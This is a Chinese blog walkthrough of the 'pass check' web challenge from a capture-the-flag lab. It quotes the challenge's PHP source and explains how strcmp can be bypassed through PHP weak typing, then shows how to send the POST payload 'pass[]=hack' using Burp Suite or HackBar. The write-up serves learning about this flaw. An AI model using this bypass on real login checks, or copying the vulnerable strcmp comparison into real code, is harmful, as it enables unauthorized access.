CG CTF WEB pass check

37 篇文章 1 订阅

http://chinalover.sinaapp.com/web21/

原理:

php的弱类型漏洞

strcmp函数接受到了不符合的类型,strcmp函数将发生错误,显示了报错的警告信息后,将 return 0。

版本一

题解:抓包

工具:Burp Suite

步骤:

$pass=@$_POST['pass'];
$pass1=***********;//被隐藏起来的密码
if(isset($pass))
{
if(@!strcmp($pass,$pass1)){
echo "flag:nctf{*}";
}else{
echo "the pass is wrong!";
}
}else{
echo "please input pass!";
}
?>

审查元素

修改HTML

<html>
<head>
</head>
<body>please input pass!
<form action="index.php" method="post">
    <input type="text" name="pass">
    <input type="submit" name="提交">
</form>
</body>
</html>

随便提交一个数据

并且抓包

右键

修改数据

GO

版本二

工具:火狐浏览器插件hackbar

步骤:

$pass=@$_POST['pass'];
$pass1=***********;//被隐藏起来的密码
if(isset($pass))
{
if(@!strcmp($pass,$pass1)){
echo "flag:nctf{*}";
}else{
echo "the pass is wrong!";
}
}else{
echo "please input pass!";
}
?>

hackbar POST 数据 

pass[]=hack

参考文章:

  1. php弱类型相关文章
  2. 浅谈php弱类型安全
  3. PHP 松散类型比较表
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Starzkg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值